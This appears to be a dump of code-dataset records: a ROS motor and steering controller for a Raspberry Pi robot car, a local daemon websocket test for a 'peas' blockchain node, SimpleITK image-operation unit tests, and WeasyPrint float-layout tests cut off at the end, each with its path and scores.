GPIO.setup(PWMThrottle.Motor_A, GPIO.OUT)
GPIO.setup(PWMThrottle.Motor_B, GPIO.OUT)
self.motor_a = PCA9685(PWMThrottle.PWM_A)
self.motor_b = PCA9685(PWMThrottle.PWM_B)
GPIO.output(PWMThrottle.Motor_A, PWMThrottle.FORWARD)
GPIO.output(PWMThrottle.Motor_B, PWMThrottle.FORWARD)
self.dir = PWMThrottle.FORWARD
self.motor_a.set_pulse(0)
self.motor_b.set_pulse(0)
self.throttle = 0
self.pulse = 0
rospy.loginfo('PWM Throttle created')
def getPWM_throttle(self, throttle):
"""
Calculate the PWM pulse value from throttle, where 1 is full forward and
-1 is full backwards, 0 is stop.
"""
if throttle == 0:
direction = PWMThrottle.FORWARD
pulse = 0
elif throttle > 0:
direction = PWMThrottle.FORWARD
pulse = int(map_range(throttle, 0, 1,
self.min_pulse, self.max_pulse))
else:
direction = PWMThrottle.BACKWARD
pulse = int(map_range(throttle, -1, 0,
self.max_pulse, self.min_pulse))
return (direction, pulse)
def run(self, throttle):
"""
Update the throttle of the motor where 1 is full forward and
-1 is full backwards.
"""
if throttle > 1 or throttle < -1:
raise ValueError(
"throttle must be between 1(forward) and -1(reverse), but {}".format(throttle))
if self.throttle == throttle:
return
self.throttle = throttle
dir, pulse = self.getPWM_throttle(throttle)
if dir != self.dir:
GPIO.output(PWMThrottle.Motor_A, dir)
GPIO.output(PWMThrottle.Motor_B, dir)
self.dir = dir
if pulse != self.pulse:
self.motor_a.set_pulse(pulse)
self.motor_b.set_pulse(pulse)
self.pulse = pulse
rospy.loginfo("Throttle, v {}, d {}, p {}".format(throttle, dir, pulse))
def shutdown(self):
self.motor_a.run(0)
self.motor_b.run(0)
GPIO.output(PWMThrottle.Motor_A, GPIO.LOW)
GPIO.output(PWMThrottle.Motor_B, GPIO.LOW)
GPIO.cleanup()
rospy.loginfo('PWM Throttle shutdown')
class TerabotLowLevelCtrl():
STEERING_SCALE = -1.0
def __init__(self):
rospy.loginfo("Setting Up the Node...")
rospy.init_node('terabot_llc')
self.actuators = {}
self.actuators['throttle'] = PWMThrottle(
max_pulse=SunFounder.THROTTLE_MAX_PWM, min_pulse=SunFounder.THROTTLE_MIN_PWM)
steering_controller = PCA9685(SunFounder.STEERING_CHANNEL)
self.actuators['steering'] = PWMSteering(controller=steering_controller,
left_pulse=SunFounder.STEERING_LEFT_PWM,
right_pulse=SunFounder.STEERING_RIGHT_PWM)
# --- Create the Subscriber to Twist commands
self.ros_sub_twist = rospy.Subscriber(
"mobile_base_controller/cmd_vel", Twist, self.set_actuators_from_cmdvel, queue_size=1)
# --- Get the last time e got a commands
self._last_time_cmd_rcv = time.time()
self._timeout_s = 2
def set_actuators_from_cmdvel(self, message):
"""
Get a message from cmd_vel, assuming a maximum input of 1
"""
# -- Save the time
self._last_time_cmd_rcv = time.time()
# -- Convert vel into servo values
self.actuators['throttle'].run(message.linear.x)
self.actuators['steering'].run(message.angular.z * TerabotLowLevelCtrl.STEERING_SCALE)
rospy.loginfo("Got a command v = %2.1f w = %2.1f" %
(message.linear.x, message.angular.z))
def set_actuators_idle(self):
# -- Convert vel into servo values
self.actuators['throttle'].run(0)
self.actuators['steering'].run(0)
def shutdown(self):
# -- Convert vel into servo values
self.actuators['throttle'].shutdown()
self.actuators['steering'].shutdown()
@property
def is_controller_connected(self):
#rospy.loginfo("is_controller_connected %s" % (time.time() - self._last_time_cmd_rcv))
return(time.time() - self._last_time_cmd_rcv < self._timeout_s)
def run(self):
# --- Set the control rate
rate = rospy.Rate(5)
while not rospy.is_shutdown():
#rospy.loginfo("run %s %d" % (self._last_time_cmd_rcv, self.is_controller_connected))
if not self.is_controller_connected:
self.set_actuators_idle()
rate.sleep()
self.shutdown()
if __name__ == "__main__":
llc = TerabotLowLevelCtrl()
llc.run() | terabot_drive/src/base_control.py | from __future__ import division
import time
import Adafruit_PCA9685
import RPi.GPIO as GPIO
from Adafruit_GPIO import I2C
import rospy
from geometry_msgs.msg import Twist
# sudo apt install RPi.GPIO
# pip install adafruit-pca9685
# pip install adafruit-gpio
class SunFounder:
# STEERING
# used for the DRIVE_TRAIN_TYPE=SUNFOUNDER_PWM
STEERING_CHANNEL = 0 # channel on the 9685 pwm board 0-15
STEERING_LEFT_PWM = 260 # pwm value for full left steering
STEERING_RIGHT_PWM = 500 # pwm value for full right steering
# THROTTLE
# used for the DRIVE_TRAIN_TYPE=SUNFOUNDER_PWM
THROTTLE_CHANNEL = 4 # channel on the 9685 pwm board 0-15
THROTTLE_MAX_PWM = 1200 # pwm value for max movement (throttle ->= 1, -1)
THROTTLE_MIN_PWM = 500 # pwm value for min movement (throttle -> 0)
# THROTTLE_ZERO_PWM = 0 #pwm value for no movement (throttle = 0)
def map_range(x, X_min, X_max, Y_min, Y_max):
'''
Linear mapping between two ranges of values
'''
X_range = X_max - X_min
Y_range = Y_max - Y_min
XY_ratio = X_range/Y_range
y = ((x-X_min) / XY_ratio + Y_min)
return int(y)
class PCA9685:
'''
PWM motor controller using PCA9685 boards.
This is used for most RC Cars
'''
def __init__(self, channel, address=0x40, frequency=60, busnum=None, init_delay=0.1):
self.default_freq = 60
self.pwm_scale = frequency / self.default_freq
# Initialise the PCA9685 using the default address (0x40).
if busnum is not None:
# replace the get_bus function with our own
def get_bus():
return busnum
I2C.get_default_bus = get_bus
self.pwm = Adafruit_PCA9685.PCA9685(address=address)
self.pwm.set_pwm_freq(frequency)
self.channel = channel
# time.sleep(init_delay) # "Tamiya TBLE-02" makes a little leap otherwise
def set_pulse(self, pulse):
try:
self.pwm.set_pwm(self.channel, 0, int(pulse * self.pwm_scale))
except:
self.pwm.set_pwm(self.channel, 0, int(pulse * self.pwm_scale))
def run(self, pulse):
self.set_pulse(pulse)
class PWMSteering:
"""
Wrapper over a PWM motor controller to convert angles to PWM pulses.
"""
LEFT_ANGLE = -1
RIGHT_ANGLE = 1
def __init__(self,
controller=None,
left_pulse=290,
right_pulse=490):
self.controller = controller
self.left_pulse = left_pulse
self.right_pulse = right_pulse
self.pulse = map_range(0, PWMSteering.LEFT_ANGLE, PWMSteering.RIGHT_ANGLE,
self.left_pulse, self.right_pulse)
self.running = True
rospy.loginfo('PWM Steering created')
def update(self):
while self.running:
self.controller.set_pulse(self.pulse)
def run(self, angle):
self.pulse = map_range(angle,
self.LEFT_ANGLE, self.RIGHT_ANGLE,
self.left_pulse, self.right_pulse)
self.controller.set_pulse(self.pulse)
def shutdown(self):
# set steering straight
self.run(0)
self.running = False
rospy.loginfo('PWM Steering shutdown')
class PWMThrottle:
"""
SunFounder DC Motor Controller.
Used for each motor on a differential drive car.
SunFounder Smart Video Car Kit V2.0/SunFounder PiCar V.
"""
Motor_A = 17 # GPIO pin for motor a
Motor_B = 27 # GPIO pin for motor b
PWM_A = 4 # pwm channel for motor a
PWM_B = 5 # pwm channel for motor b
FORWARD = False
BACKWARD = True
def __init__(self,
max_pulse=1200,
min_pulse=500):
self.max_pulse = 1200 if max_pulse == 0 else max_pulse
self.min_pulse = 500 if min_pulse == 0 else min_pulse
GPIO.setmode(GPIO.BCM)
GPIO.setup(PWMThrottle.Motor_A, GPIO.OUT)
GPIO.setup(PWMThrottle.Motor_B, GPIO.OUT)
self.motor_a = PCA9685(PWMThrottle.PWM_A)
self.motor_b = PCA9685(PWMThrottle.PWM_B)
GPIO.output(PWMThrottle.Motor_A, PWMThrottle.FORWARD)
GPIO.output(PWMThrottle.Motor_B, PWMThrottle.FORWARD)
self.dir = PWMThrottle.FORWARD
self.motor_a.set_pulse(0)
self.motor_b.set_pulse(0)
self.throttle = 0
self.pulse = 0
rospy.loginfo('PWM Throttle created')
def getPWM_throttle(self, throttle):
"""
Calculate the PWM pulse value from throttle, where 1 is full forward and
-1 is full backwards, 0 is stop.
"""
if throttle == 0:
direction = PWMThrottle.FORWARD
pulse = 0
elif throttle > 0:
direction = PWMThrottle.FORWARD
pulse = int(map_range(throttle, 0, 1,
self.min_pulse, self.max_pulse))
else:
direction = PWMThrottle.BACKWARD
pulse = int(map_range(throttle, -1, 0,
self.max_pulse, self.min_pulse))
return (direction, pulse)
def run(self, throttle):
"""
Update the throttle of the motor where 1 is full forward and
-1 is full backwards.
"""
if throttle > 1 or throttle < -1:
raise ValueError(
"throttle must be between 1(forward) and -1(reverse), but {}".format(throttle))
if self.throttle == throttle:
return
self.throttle = throttle
dir, pulse = self.getPWM_throttle(throttle)
if dir != self.dir:
GPIO.output(PWMThrottle.Motor_A, dir)
GPIO.output(PWMThrottle.Motor_B, dir)
self.dir = dir
if pulse != self.pulse:
self.motor_a.set_pulse(pulse)
self.motor_b.set_pulse(pulse)
self.pulse = pulse
rospy.loginfo("Throttle, v {}, d {}, p {}".format(throttle, dir, pulse))
def shutdown(self):
self.motor_a.run(0)
self.motor_b.run(0)
GPIO.output(PWMThrottle.Motor_A, GPIO.LOW)
GPIO.output(PWMThrottle.Motor_B, GPIO.LOW)
GPIO.cleanup()
rospy.loginfo('PWM Throttle shutdown')
class TerabotLowLevelCtrl():
STEERING_SCALE = -1.0
def __init__(self):
rospy.loginfo("Setting Up the Node...")
rospy.init_node('terabot_llc')
self.actuators = {}
self.actuators['throttle'] = PWMThrottle(
max_pulse=SunFounder.THROTTLE_MAX_PWM, min_pulse=SunFounder.THROTTLE_MIN_PWM)
steering_controller = PCA9685(SunFounder.STEERING_CHANNEL)
self.actuators['steering'] = PWMSteering(controller=steering_controller,
left_pulse=SunFounder.STEERING_LEFT_PWM,
right_pulse=SunFounder.STEERING_RIGHT_PWM)
# --- Create the Subscriber to Twist commands
self.ros_sub_twist = rospy.Subscriber(
"mobile_base_controller/cmd_vel", Twist, self.set_actuators_from_cmdvel, queue_size=1)
# --- Get the last time e got a commands
self._last_time_cmd_rcv = time.time()
self._timeout_s = 2
def set_actuators_from_cmdvel(self, message):
"""
Get a message from cmd_vel, assuming a maximum input of 1
"""
# -- Save the time
self._last_time_cmd_rcv = time.time()
# -- Convert vel into servo values
self.actuators['throttle'].run(message.linear.x)
self.actuators['steering'].run(message.angular.z * TerabotLowLevelCtrl.STEERING_SCALE)
rospy.loginfo("Got a command v = %2.1f w = %2.1f" %
(message.linear.x, message.angular.z))
def set_actuators_idle(self):
# -- Convert vel into servo values
self.actuators['throttle'].run(0)
self.actuators['steering'].run(0)
def shutdown(self):
# -- Convert vel into servo values
self.actuators['throttle'].shutdown()
self.actuators['steering'].shutdown()
@property
def is_controller_connected(self):
#rospy.loginfo("is_controller_connected %s" % (time.time() - self._last_time_cmd_rcv))
return(time.time() - self._last_time_cmd_rcv < self._timeout_s)
def run(self):
# --- Set the control rate
rate = rospy.Rate(5)
while not rospy.is_shutdown():
#rospy.loginfo("run %s %d" % (self._last_time_cmd_rcv, self.is_controller_connected))
if not self.is_controller_connected:
self.set_actuators_idle()
rate.sleep()
self.shutdown()
if __name__ == "__main__":
llc = TerabotLowLevelCtrl()
llc.run() | 0.610918 | 0.155976 |
from peas.server.outbound_message import NodeType
from peas.server.server import ssl_context_for_server
from peas.types.peer_info import PeerInfo
from tests.block_tools import create_block_tools
from peas.util.ints import uint16
from peas.util.ws_message import create_payload
from tests.core.node_height import node_height_at_least
from tests.setup_nodes import setup_daemon, self_hostname, setup_full_system
from tests.simulation.test_simulation import test_constants_modified
from tests.time_out_assert import time_out_assert, time_out_assert_custom_interval
from tests.util.keyring import TempKeyring
import asyncio
import atexit
import json
import aiohttp
import pytest
def cleanup_keyring(keyring: TempKeyring):
keyring.cleanup()
temp_keyring1 = TempKeyring()
temp_keyring2 = TempKeyring()
atexit.register(cleanup_keyring, temp_keyring1)
atexit.register(cleanup_keyring, temp_keyring2)
b_tools = create_block_tools(constants=test_constants_modified, keychain=temp_keyring1.get_keychain())
b_tools_1 = create_block_tools(constants=test_constants_modified, keychain=temp_keyring2.get_keychain())
new_config = b_tools._config
new_config["daemon_port"] = 55401
b_tools.change_config(new_config)
class TestDaemon:
@pytest.fixture(scope="function")
async def get_daemon(self):
async for _ in setup_daemon(btools=b_tools):
yield _
@pytest.fixture(scope="function")
async def simulation(self):
async for _ in setup_full_system(
b_tools_1.constants, b_tools=b_tools, b_tools_1=b_tools_1, connect_to_daemon=True
):
yield _
@pytest.mark.asyncio
async def test_daemon_simulation(self, simulation, get_daemon):
node1, node2, _, _, _, _, _, _, _, server1 = simulation
await server1.start_client(PeerInfo(self_hostname, uint16(21238)))
async def num_connections():
count = len(node2.server.connection_by_type[NodeType.FULL_NODE].items())
return count
await time_out_assert_custom_interval(60, 1, num_connections, 1)
await time_out_assert(1500, node_height_at_least, True, node2, 1)
session = aiohttp.ClientSession()
crt_path = b_tools.root_path / b_tools.config["daemon_ssl"]["private_crt"]
key_path = b_tools.root_path / b_tools.config["daemon_ssl"]["private_key"]
ca_cert_path = b_tools.root_path / b_tools.config["private_ssl_ca"]["crt"]
ca_key_path = b_tools.root_path / b_tools.config["private_ssl_ca"]["key"]
ssl_context = ssl_context_for_server(ca_cert_path, ca_key_path, crt_path, key_path)
ws = await session.ws_connect(
"wss://127.0.0.1:55401",
autoclose=True,
autoping=True,
heartbeat=60,
ssl_context=ssl_context,
max_msg_size=100 * 1024 * 1024,
)
service_name = "test_service_name"
data = {"service": service_name}
payload = create_payload("register_service", data, service_name, "daemon")
await ws.send_str(payload)
message_queue = asyncio.Queue()
async def reader(ws, queue):
while True:
msg = await ws.receive()
if msg.type == aiohttp.WSMsgType.TEXT:
message = msg.data.strip()
message = json.loads(message)
await queue.put(message)
elif msg.type == aiohttp.WSMsgType.PING:
await ws.pong()
elif msg.type == aiohttp.WSMsgType.PONG:
continue
else:
if msg.type == aiohttp.WSMsgType.CLOSE:
await ws.close()
elif msg.type == aiohttp.WSMsgType.ERROR:
await ws.close()
elif msg.type == aiohttp.WSMsgType.CLOSED:
pass
break
read_handler = asyncio.create_task(reader(ws, message_queue))
data = {}
payload = create_payload("get_blockchain_state", data, service_name, "peas_full_node")
await ws.send_str(payload)
await asyncio.sleep(5)
blockchain_state_found = False
while not message_queue.empty():
message = await message_queue.get()
if message["command"] == "get_blockchain_state":
blockchain_state_found = True
await ws.close()
read_handler.cancel()
assert blockchain_state_found | tests/core/daemon/test_daemon.py | from peas.server.outbound_message import NodeType
from peas.server.server import ssl_context_for_server
from peas.types.peer_info import PeerInfo
from tests.block_tools import create_block_tools
from peas.util.ints import uint16
from peas.util.ws_message import create_payload
from tests.core.node_height import node_height_at_least
from tests.setup_nodes import setup_daemon, self_hostname, setup_full_system
from tests.simulation.test_simulation import test_constants_modified
from tests.time_out_assert import time_out_assert, time_out_assert_custom_interval
from tests.util.keyring import TempKeyring
import asyncio
import atexit
import json
import aiohttp
import pytest
def cleanup_keyring(keyring: TempKeyring):
keyring.cleanup()
temp_keyring1 = TempKeyring()
temp_keyring2 = TempKeyring()
atexit.register(cleanup_keyring, temp_keyring1)
atexit.register(cleanup_keyring, temp_keyring2)
b_tools = create_block_tools(constants=test_constants_modified, keychain=temp_keyring1.get_keychain())
b_tools_1 = create_block_tools(constants=test_constants_modified, keychain=temp_keyring2.get_keychain())
new_config = b_tools._config
new_config["daemon_port"] = 55401
b_tools.change_config(new_config)
class TestDaemon:
@pytest.fixture(scope="function")
async def get_daemon(self):
async for _ in setup_daemon(btools=b_tools):
yield _
@pytest.fixture(scope="function")
async def simulation(self):
async for _ in setup_full_system(
b_tools_1.constants, b_tools=b_tools, b_tools_1=b_tools_1, connect_to_daemon=True
):
yield _
@pytest.mark.asyncio
async def test_daemon_simulation(self, simulation, get_daemon):
node1, node2, _, _, _, _, _, _, _, server1 = simulation
await server1.start_client(PeerInfo(self_hostname, uint16(21238)))
async def num_connections():
count = len(node2.server.connection_by_type[NodeType.FULL_NODE].items())
return count
await time_out_assert_custom_interval(60, 1, num_connections, 1)
await time_out_assert(1500, node_height_at_least, True, node2, 1)
session = aiohttp.ClientSession()
crt_path = b_tools.root_path / b_tools.config["daemon_ssl"]["private_crt"]
key_path = b_tools.root_path / b_tools.config["daemon_ssl"]["private_key"]
ca_cert_path = b_tools.root_path / b_tools.config["private_ssl_ca"]["crt"]
ca_key_path = b_tools.root_path / b_tools.config["private_ssl_ca"]["key"]
ssl_context = ssl_context_for_server(ca_cert_path, ca_key_path, crt_path, key_path)
ws = await session.ws_connect(
"wss://127.0.0.1:55401",
autoclose=True,
autoping=True,
heartbeat=60,
ssl_context=ssl_context,
max_msg_size=100 * 1024 * 1024,
)
service_name = "test_service_name"
data = {"service": service_name}
payload = create_payload("register_service", data, service_name, "daemon")
await ws.send_str(payload)
message_queue = asyncio.Queue()
async def reader(ws, queue):
while True:
msg = await ws.receive()
if msg.type == aiohttp.WSMsgType.TEXT:
message = msg.data.strip()
message = json.loads(message)
await queue.put(message)
elif msg.type == aiohttp.WSMsgType.PING:
await ws.pong()
elif msg.type == aiohttp.WSMsgType.PONG:
continue
else:
if msg.type == aiohttp.WSMsgType.CLOSE:
await ws.close()
elif msg.type == aiohttp.WSMsgType.ERROR:
await ws.close()
elif msg.type == aiohttp.WSMsgType.CLOSED:
pass
break
read_handler = asyncio.create_task(reader(ws, message_queue))
data = {}
payload = create_payload("get_blockchain_state", data, service_name, "peas_full_node")
await ws.send_str(payload)
await asyncio.sleep(5)
blockchain_state_found = False
while not message_queue.empty():
message = await message_queue.get()
if message["command"] == "get_blockchain_state":
blockchain_state_found = True
await ws.close()
read_handler.cancel()
assert blockchain_state_found | 0.366476 | 0.349699 |
import unittest
import numpy as np
import SimpleITK as sitk
from deliravision.utils.image_ops import bounding_box, \
calculate_origin_offset, max_energy_slice, \
sitk_copy_metadata, sitk_new_blank_image, \
sitk_resample_to_image, sitk_resample_to_shape, sitk_resample_to_spacing
class ImageOpTest(unittest.TestCase):
def setUp(self) -> None:
self._img = np.zeros((45, 45, 45))
self._img[23:25, 5:40, 10:35] = 1
# convert array to nested list
self._img = self._img.tolist()
def test_bounding_box(self):
bbox_list = bounding_box(self._img)
self.assertTupleEqual(bbox_list, (23, 24, 5, 39, 10, 34))
img_npy = np.array(self._img)
bbox_npy = bounding_box(img_npy)
self.assertTupleEqual(bbox_npy, (23, 24, 5, 39, 10, 34))
img_sitk = sitk.GetImageFromArray(img_npy)
bbox_sitk = bounding_box(img_sitk)
self.assertTupleEqual(bbox_sitk, (23, 24, 5, 39, 10, 34))
def test_calculate_origin_offset(self):
offset = calculate_origin_offset((3., 1., 1.), (1., 1., 1.))
# check for almost equal due to machine precision issues
for _offset, _target_offset in zip(offset.tolist(), [1., 0., 0.]):
self.assertAlmostEqual(_offset, _target_offset)
offset = calculate_origin_offset((1.5, 1.4, 1.3), (1., 1., 1.))
# check for almost equal due to machine precision issues
for _offset, _target_offset in zip(offset.tolist(), [0.25, 0.2, 0.15]):
self.assertAlmostEqual(_offset, _target_offset)
def test_max_energy_slice(self):
slice_idx = max_energy_slice(
sitk.GetImageFromArray(
np.array(
self._img)))
self.assertIn(slice_idx, [23, 24])
def test_copy_metadata(self):
img_sitk = sitk.GetImageFromArray(np.array(self._img))
img_sitk.SetMetaData("Foo", "Bar")
blank_image = sitk.GetImageFromArray(np.zeros((10, 10, 10)))
blank_image = sitk_copy_metadata(img_sitk, blank_image)
for key in blank_image.GetMetaDataKeys():
self.assertEqual(img_sitk.GetMetaData(key),
blank_image.GetMetaData(key))
def test_new_blank_image(self):
shape = (15, 13, 12)
spacing = (1., 2., 3.)
direction = (1.0, 1.0, 0.0, 0.0, 1.0, 1.0, 1.0, 0.0, 1.0)
origin = (0., 0., 0.)
img = sitk_new_blank_image(shape, spacing, direction, origin)
self.assertTupleEqual(img.GetSize(), shape)
self.assertTupleEqual(img.GetSpacing(), spacing)
self.assertTupleEqual(img.GetDirection(), direction)
self.assertTupleEqual(img.GetOrigin(), origin)
def test_resample_to_image(self):
src_img = sitk_new_blank_image((34, 34, 34), (2, 3, 4))
resampled_img = sitk_resample_to_image(
src_img, sitk.GetImageFromArray(np.array(self._img)))
self.assertTupleEqual(
resampled_img.GetSize(), np.array(
self._img).shape)
self.assertTupleEqual(resampled_img.GetSpacing(), (1., 1., 1.))
def test_resample_to_shape(self):
src_img = sitk_new_blank_image((34, 34, 34), (2, 3, 4))
resampled_img = sitk_resample_to_shape(
src_img, np.array(self._img).shape)
self.assertTupleEqual(resampled_img.GetSize(),
np.array(self._img).shape)
def test_resample_to_spacing(self):
src_img = sitk.GetImageFromArray(np.array(self._img))
resampled_img = sitk_resample_to_spacing(src_img, (2., 3., 4.))
self.assertTupleEqual(resampled_img.GetSpacing(), (2., 3., 4.))
if __name__ == "__main__":
unittest.main() | tests/utils/image_ops.py | import unittest
import numpy as np
import SimpleITK as sitk
from deliravision.utils.image_ops import bounding_box, \
calculate_origin_offset, max_energy_slice, \
sitk_copy_metadata, sitk_new_blank_image, \
sitk_resample_to_image, sitk_resample_to_shape, sitk_resample_to_spacing
class ImageOpTest(unittest.TestCase):
def setUp(self) -> None:
self._img = np.zeros((45, 45, 45))
self._img[23:25, 5:40, 10:35] = 1
# convert array to nested list
self._img = self._img.tolist()
def test_bounding_box(self):
bbox_list = bounding_box(self._img)
self.assertTupleEqual(bbox_list, (23, 24, 5, 39, 10, 34))
img_npy = np.array(self._img)
bbox_npy = bounding_box(img_npy)
self.assertTupleEqual(bbox_npy, (23, 24, 5, 39, 10, 34))
img_sitk = sitk.GetImageFromArray(img_npy)
bbox_sitk = bounding_box(img_sitk)
self.assertTupleEqual(bbox_sitk, (23, 24, 5, 39, 10, 34))
def test_calculate_origin_offset(self):
offset = calculate_origin_offset((3., 1., 1.), (1., 1., 1.))
# check for almost equal due to machine precision issues
for _offset, _target_offset in zip(offset.tolist(), [1., 0., 0.]):
self.assertAlmostEqual(_offset, _target_offset)
offset = calculate_origin_offset((1.5, 1.4, 1.3), (1., 1., 1.))
# check for almost equal due to machine precision issues
for _offset, _target_offset in zip(offset.tolist(), [0.25, 0.2, 0.15]):
self.assertAlmostEqual(_offset, _target_offset)
def test_max_energy_slice(self):
slice_idx = max_energy_slice(
sitk.GetImageFromArray(
np.array(
self._img)))
self.assertIn(slice_idx, [23, 24])
def test_copy_metadata(self):
img_sitk = sitk.GetImageFromArray(np.array(self._img))
img_sitk.SetMetaData("Foo", "Bar")
blank_image = sitk.GetImageFromArray(np.zeros((10, 10, 10)))
blank_image = sitk_copy_metadata(img_sitk, blank_image)
for key in blank_image.GetMetaDataKeys():
self.assertEqual(img_sitk.GetMetaData(key),
blank_image.GetMetaData(key))
def test_new_blank_image(self):
shape = (15, 13, 12)
spacing = (1., 2., 3.)
direction = (1.0, 1.0, 0.0, 0.0, 1.0, 1.0, 1.0, 0.0, 1.0)
origin = (0., 0., 0.)
img = sitk_new_blank_image(shape, spacing, direction, origin)
self.assertTupleEqual(img.GetSize(), shape)
self.assertTupleEqual(img.GetSpacing(), spacing)
self.assertTupleEqual(img.GetDirection(), direction)
self.assertTupleEqual(img.GetOrigin(), origin)
def test_resample_to_image(self):
src_img = sitk_new_blank_image((34, 34, 34), (2, 3, 4))
resampled_img = sitk_resample_to_image(
src_img, sitk.GetImageFromArray(np.array(self._img)))
self.assertTupleEqual(
resampled_img.GetSize(), np.array(
self._img).shape)
self.assertTupleEqual(resampled_img.GetSpacing(), (1., 1., 1.))
def test_resample_to_shape(self):
src_img = sitk_new_blank_image((34, 34, 34), (2, 3, 4))
resampled_img = sitk_resample_to_shape(
src_img, np.array(self._img).shape)
self.assertTupleEqual(resampled_img.GetSize(),
np.array(self._img).shape)
def test_resample_to_spacing(self):
src_img = sitk.GetImageFromArray(np.array(self._img))
resampled_img = sitk_resample_to_spacing(src_img, (2., 3., 4.))
self.assertTupleEqual(resampled_img.GetSpacing(), (2., 3., 4.))
if __name__ == "__main__":
unittest.main() | 0.665193 | 0.717829 |
import pytest
from weasyprint.formatting_structure import boxes
from .testing_utils import assert_no_logs, render_pages
def outer_area(box):
"""Return the (x, y, w, h) rectangle for the outer area of a box."""
return (box.position_x, box.position_y,
box.margin_width(), box.margin_height())
@assert_no_logs
def test_floats_1():
    # adjacent-floats-001
    # Two 100px left floats fit side by side in the containing block:
    # the second is placed immediately to the right of the first.
    page, = render_pages('''
      <style>
        div { float: left }
        img { width: 100px; vertical-align: top }
      </style>
      <div><img src=pattern.png /></div>
      <div><img src=pattern.png /></div>''')
    html, = page.children
    body, = html.children
    div_1, div_2 = body.children
    assert outer_area(div_1) == (0, 0, 100, 100)
    assert outer_area(div_2) == (100, 0, 100, 100)
@assert_no_logs
def test_floats_2():
    # c414-flt-fit-000
    # 290px body, 100px floats: floats 1 and 2 fit on the first row and
    # in-flow image 3 fills the remaining space beside them; float 4 and
    # image 5 wrap to the second row.
    page, = render_pages('''
      <style>
        body { width: 290px }
        div { float: left; width: 100px; }
        img { width: 60px; vertical-align: top }
      </style>
      <div><img src=pattern.png /><!-- 1 --></div>
      <div><img src=pattern.png /><!-- 2 --></div>
      <div><img src=pattern.png /><!-- 4 --></div>
      <img src=pattern.png /><!-- 3
      --><img src=pattern.png /><!-- 5 -->''')
    html, = page.children
    body, = html.children
    # The three floats come first in the box tree; the two in-flow images
    # are wrapped in an anonymous block, one line box each.
    div_1, div_2, div_4, anon_block = body.children
    line_3, line_5 = anon_block.children
    img_3, = line_3.children
    img_5, = line_5.children
    assert outer_area(div_1) == (0, 0, 100, 60)
    assert outer_area(div_2) == (100, 0, 100, 60)
    assert outer_area(img_3) == (200, 0, 60, 60)
    assert outer_area(div_4) == (0, 60, 100, 60)
    assert outer_area(img_5) == (100, 60, 60, 60)
@assert_no_logs
def test_floats_3():
    # c414-flt-fit-002
    # 200px body, 70px paragraphs: left floats pack from the left edge,
    # right floats from the right edge (x=130), wrapping to a new 20px row
    # whenever the current row is full.
    page, = render_pages('''
      <style type="text/css">
        body { width: 200px }
        p { width: 70px; height: 20px }
        .left { float: left }
        .right { float: right }
      </style>
      <p class="left"> ⇦ A 1 </p>
      <p class="left"> ⇦ B 2 </p>
      <p class="left"> ⇦ A 3 </p>
      <p class="right"> B 4 ⇨ </p>
      <p class="left"> ⇦ A 5 </p>
      <p class="right"> B 6 ⇨ </p>
      <p class="right"> B 8 ⇨ </p>
      <p class="left"> ⇦ A 7 </p>
      <p class="left"> ⇦ A 9 </p>
      <p class="left"> ⇦ B 10 </p>
    ''')
    html, = page.children
    body, = html.children
    positions = [(paragraph.position_x, paragraph.position_y)
                 for paragraph in body.children]
    # Expected positions in document order (one tuple per paragraph).
    assert positions == [
        (0, 0), (70, 0), (0, 20), (130, 20), (0, 40), (130, 40),
        (130, 60), (0, 60), (0, 80), (70, 80), ]
@assert_no_logs
def test_floats_4():
    # c414-flt-wrap-000 ... more or less
    # The first line fits beside the 20px float; the 100%-wide float does
    # not fit next to it and drops below, so the second line of images is
    # pushed past both floats (y = 200).
    page, = render_pages('''
      <style>
        body { width: 100px }
        p { float: left; height: 100px }
        img { width: 60px; vertical-align: top }
      </style>
      <p style="width: 20px"></p>
      <p style="width: 100%"></p>
      <img src=pattern.png /><img src=pattern.png />
    ''')
    html, = page.children
    body, = html.children
    p_1, p_2, anon_block = body.children
    line_1, line_2 = anon_block.children
    assert anon_block.position_y == 0
    assert (line_1.position_x, line_1.position_y) == (20, 0)
    assert (line_2.position_x, line_2.position_y) == (0, 200)
@assert_no_logs
def test_floats_5():
    # c414-flt-wrap-000 with text ... more or less
    # Same layout as test_floats_4 but with 60px text instead of images:
    # "A" fits beside the 20px float, "B" wraps below both floats.
    page, = render_pages('''
      <style>
        @font-face { src: url(weasyprint.otf); font-family: weasyprint }
        body { width: 100px; font: 60px weasyprint; }
        p { float: left; height: 100px }
        img { width: 60px; vertical-align: top }
      </style>
      <p style="width: 20px"></p>
      <p style="width: 100%"></p>
      A B
    ''')
    html, = page.children
    body, = html.children
    p_1, p_2, anon_block = body.children
    line_1, line_2 = anon_block.children
    assert anon_block.position_y == 0
    assert (line_1.position_x, line_1.position_y) == (20, 0)
    assert (line_2.position_x, line_2.position_y) == (0, 200)
@assert_no_logs
def test_floats_6():
    # floats-placement-vertical-001b
    # A float declared inside an inline <span>: the first 50px image fills
    # line 1 of the 90px body; on line 2 the 30px float takes the left
    # edge and the second in-flow image is shifted to x=30.
    page, = render_pages('''
      <style>
        body { width: 90px; font-size: 0 }
        img { vertical-align: top }
      </style>
      <body>
        <span>
          <img src=pattern.png style="width: 50px" />
          <img src=pattern.png style="width: 50px" />
          <img src=pattern.png style="float: left; width: 30px" />
        </span>
    ''')
    html, = page.children
    body, = html.children
    # The span is split across the two line boxes.
    line_1, line_2 = body.children
    span_1, = line_1.children
    span_2, = line_2.children
    img_1, = span_1.children
    img_2, img_3 = span_2.children
    assert outer_area(img_1) == (0, 0, 50, 50)
    assert outer_area(img_2) == (30, 50, 50, 50)
    assert outer_area(img_3) == (0, 50, 30, 30)
@assert_no_logs
def test_floats_7():
    # Variant of the above: no <span>
    # Same expected geometry as test_floats_6, but the images are direct
    # children of the line boxes.
    page, = render_pages('''
      <style>
        body { width: 90px; font-size: 0 }
        img { vertical-align: top }
      </style>
      <body>
        <img src=pattern.png style="width: 50px" />
        <img src=pattern.png style="width: 50px" />
        <img src=pattern.png style="float: left; width: 30px" />
    ''')
    html, = page.children
    body, = html.children
    line_1, line_2 = body.children
    img_1, = line_1.children
    img_2, img_3 = line_2.children
    assert outer_area(img_1) == (0, 0, 50, 50)
    assert outer_area(img_2) == (30, 50, 50, 50)
    assert outer_area(img_3) == (0, 50, 30, 30)
@assert_no_logs
def test_floats_8():
    # Floats do not affect other pages.
    page_1, page_2 = render_pages('''
      <style>
        body { width: 90px; font-size: 0 }
        img { vertical-align: top }
      </style>
      <body>
        <img src=pattern.png style="float: left; width: 30px" />
        <img src=pattern.png style="width: 50px" />
        <div style="page-break-before: always"></div>
